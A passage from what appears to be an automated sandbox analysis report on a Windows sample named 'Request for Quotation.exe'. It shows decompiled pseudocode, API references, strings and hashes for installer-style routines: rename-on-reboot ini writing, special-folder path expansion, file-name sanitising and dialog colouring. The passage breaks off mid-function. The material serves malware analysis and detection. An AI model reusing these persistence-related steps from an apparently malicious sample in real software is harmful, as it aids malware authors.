					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                0x00405ebc
                                                                                0x00405ec5
                                                                                0x00405ecc
                                                                                0x00405ee0
                                                                                0x00405f08
                                                                                0x00405f13
                                                                                0x00405f17
                                                                                0x00405f37
                                                                                0x00405f3e
                                                                                0x00405f48
                                                                                0x00405f55
                                                                                0x00405f5a
                                                                                0x00405f5f
                                                                                0x00405f63
                                                                                0x00405f72
                                                                                0x00405f74
                                                                                0x00405f81
                                                                                0x00405f85
                                                                                0x00406020
                                                                                0x00000000
                                                                                0x00405f9b
                                                                                0x00405fa8
                                                                                0x00405fcc
                                                                                0x00405fd0
                                                                                0x00405fef
                                                                                0x00405ff3
                                                                                0x00405ff3
                                                                                0x00405ff5
                                                                                0x00405ffe
                                                                                0x00406009
                                                                                0x00406014
                                                                                0x0040601a
                                                                                0x00000000
                                                                                0x0040601a
                                                                                0x00405fd2
                                                                                0x00405fd5
                                                                                0x00405fe0
                                                                                0x00405fdc
                                                                                0x00405fde
                                                                                0x00405fdf
                                                                                0x00405fdf
                                                                                0x00405fe7
                                                                                0x00405fe9
                                                                                0x00000000
                                                                                0x00405fe9
                                                                                0x00405fb3
                                                                                0x00405fb9
                                                                                0x00000000
                                                                                0x00405fb9
                                                                                0x00405f85
                                                                                0x00405f63
                                                                                0x00405ee2
                                                                                0x00405eed
                                                                                0x00405ef6
                                                                                0x00405efa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405efa
                                                                                0x0040602b

                                                                                APIs
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                                • GetShortPathNameA.KERNEL32(?,0042C648,00000400), ref: 00405EF6
                                                                                  • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                  • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                • GetShortPathNameA.KERNEL32(?,0042CA48,00000400), ref: 00405F13
                                                                                • wsprintfA.USER32 ref: 00405F31
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                • GlobalFree.KERNEL32 ref: 0040601A
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                                  • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405DEA
                                                                                  • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                • String ID: %s=%s$[Rename]
                                                                                • API String ID: 2171350718-1727408572
                                                                                • Opcode ID: aa6939ac238f388c35aac3f6ed86af9ca24a124bbe4c5df02d85bba9ad26e0ee
                                                                                • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                                • Opcode Fuzzy Hash: aa6939ac238f388c35aac3f6ed86af9ca24a124bbe4c5df02d85bba9ad26e0ee
                                                                                • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x6aacde
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}



























                                                                                0x004062e0
                                                                                0x004062e0
                                                                                0x004062e0
                                                                                0x004062e6
                                                                                0x004062eb
                                                                                0x004062ed
                                                                                0x004062fc
                                                                                0x004062fc
                                                                                0x00406304
                                                                                0x00406305
                                                                                0x00406306
                                                                                0x00406307
                                                                                0x0040630a
                                                                                0x00406312
                                                                                0x00406314
                                                                                0x0040632b
                                                                                0x0040632e
                                                                                0x0040632e
                                                                                0x00406505
                                                                                0x00406505
                                                                                0x00406509
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040633b
                                                                                0x00406341
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406347
                                                                                0x00406348
                                                                                0x0040634b
                                                                                0x0040634e
                                                                                0x004064f8
                                                                                0x00406502
                                                                                0x00406504
                                                                                0x00406504
                                                                                0x004064fa
                                                                                0x004064fc
                                                                                0x004064fe
                                                                                0x004064ff
                                                                                0x004064ff
                                                                                0x00000000
                                                                                0x004064f8
                                                                                0x00406354
                                                                                0x00406358
                                                                                0x00406368
                                                                                0x0040636f
                                                                                0x00406372
                                                                                0x0040637a
                                                                                0x0040637d
                                                                                0x00406384
                                                                                0x00406385
                                                                                0x00406388
                                                                                0x004064a5
                                                                                0x004064a8
                                                                                0x004064d8
                                                                                0x004064db
                                                                                0x004064e0
                                                                                0x004064e4
                                                                                0x004064e4
                                                                                0x004064e9
                                                                                0x004064ef
                                                                                0x004064f1
                                                                                0x00000000
                                                                                0x004064f1
                                                                                0x004064aa
                                                                                0x004064ad
                                                                                0x004064c2
                                                                                0x004064c9
                                                                                0x004064af
                                                                                0x004064b6
                                                                                0x004064b6
                                                                                0x004064d1
                                                                                0x004064d4
                                                                                0x0040649d
                                                                                0x0040649e
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x004064d4
                                                                                0x0040638e
                                                                                0x00406395
                                                                                0x00406397
                                                                                0x00406398
                                                                                0x004063b2
                                                                                0x004063b2
                                                                                0x004063b9
                                                                                0x004063b9
                                                                                0x004063c0
                                                                                0x004063c4
                                                                                0x004063c4
                                                                                0x004063c5
                                                                                0x004063c7
                                                                                0x00406400
                                                                                0x00406403
                                                                                0x00406413
                                                                                0x00406416
                                                                                0x0040641e
                                                                                0x00406424
                                                                                0x00406424
                                                                                0x00406483
                                                                                0x00406483
                                                                                0x00406485
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406428
                                                                                0x0040642f
                                                                                0x00406430
                                                                                0x00406432
                                                                                0x0040644c
                                                                                0x0040645a
                                                                                0x00406460
                                                                                0x00406462
                                                                                0x00406480
                                                                                0x00406480
                                                                                0x00406480
                                                                                0x00000000
                                                                                0x00406480
                                                                                0x00406468
                                                                                0x00406471
                                                                                0x00406474
                                                                                0x0040647a
                                                                                0x0040647e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040647e
                                                                                0x00406434
                                                                                0x00406437
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406446
                                                                                0x00406448
                                                                                0x0040644a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040644a
                                                                                0x00000000
                                                                                0x00406483
                                                                                0x0040640b
                                                                                0x00000000
                                                                                0x004063c9
                                                                                0x004063e4
                                                                                0x004063e9
                                                                                0x004063ec
                                                                                0x0040648c
                                                                                0x0040648c
                                                                                0x00406490
                                                                                0x00406498
                                                                                0x00406498
                                                                                0x00000000
                                                                                0x00406490
                                                                                0x004063f6
                                                                                0x00406487
                                                                                0x00406487
                                                                                0x0040648a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040648a
                                                                                0x004063c7
                                                                                0x0040639a
                                                                                0x0040639e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063a0
                                                                                0x004063a4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063a6
                                                                                0x004063aa
                                                                                0x00000000
                                                                                0x004063ac
                                                                                0x004063ac
                                                                                0x00000000
                                                                                0x004063ac
                                                                                0x004063aa
                                                                                0x0040650f
                                                                                0x00406519
                                                                                0x00406525
                                                                                0x00406525
                                                                                0x00000000

                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040640B
                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 717251189-1230650788
                                                                                • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                0x0040652a
                                                                                0x00406532
                                                                                0x00406546
                                                                                0x00406546
                                                                                0x0040654c
                                                                                0x00406559
                                                                                0x00406559
                                                                                0x0040655a
                                                                                0x0040655c
                                                                                0x00406560
                                                                                0x00406562
                                                                                0x0040656b
                                                                                0x0040656d
                                                                                0x00406587
                                                                                0x0040658f
                                                                                0x0040658f
                                                                                0x00406594
                                                                                0x00406596
                                                                                0x00406598
                                                                                0x0040659c
                                                                                0x0040659d
                                                                                0x004065a0
                                                                                0x004065a8
                                                                                0x004065aa
                                                                                0x004065ae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004065b4
                                                                                0x004065b9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004065b9
                                                                                0x004065be

                                                                                APIs
                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                Strings
                                                                                • *?|<>/":, xrefs: 00406570
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00406564
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-1663863929
                                                                                • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                0x0040434a
                                                                                0x00404400
                                                                                0x00000000
                                                                                0x00404400
                                                                                0x0040435b
                                                                                0x0040435f
                                                                                0x00000000
                                                                                0x00404379
                                                                                0x00404379
                                                                                0x00404382
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404384
                                                                                0x00404390
                                                                                0x00404393
                                                                                0x00404393
                                                                                0x00404399
                                                                                0x0040439f
                                                                                0x0040439f
                                                                                0x004043ab
                                                                                0x004043b1
                                                                                0x004043b8
                                                                                0x004043bb
                                                                                0x004043be
                                                                                0x004043c0
                                                                                0x004043c0
                                                                                0x004043c8
                                                                                0x004043ce
                                                                                0x004043ce
                                                                                0x004043d8
                                                                                0x004043dd
                                                                                0x004043e0
                                                                                0x004043e5
                                                                                0x004043e8
                                                                                0x004043e8
                                                                                0x004043f8
                                                                                0x004043f8
                                                                                0x00000000
                                                                                0x004043fb

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                                • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F7124D8, Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E6F7124D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E6F711215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M6F712626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x6f71307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6f71309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6F711429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x6f71405c);
								goto L17;
							case 4:
								__ecx =  *0x6f71405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x6f71405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x6f71405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6f714000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E6F7112D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
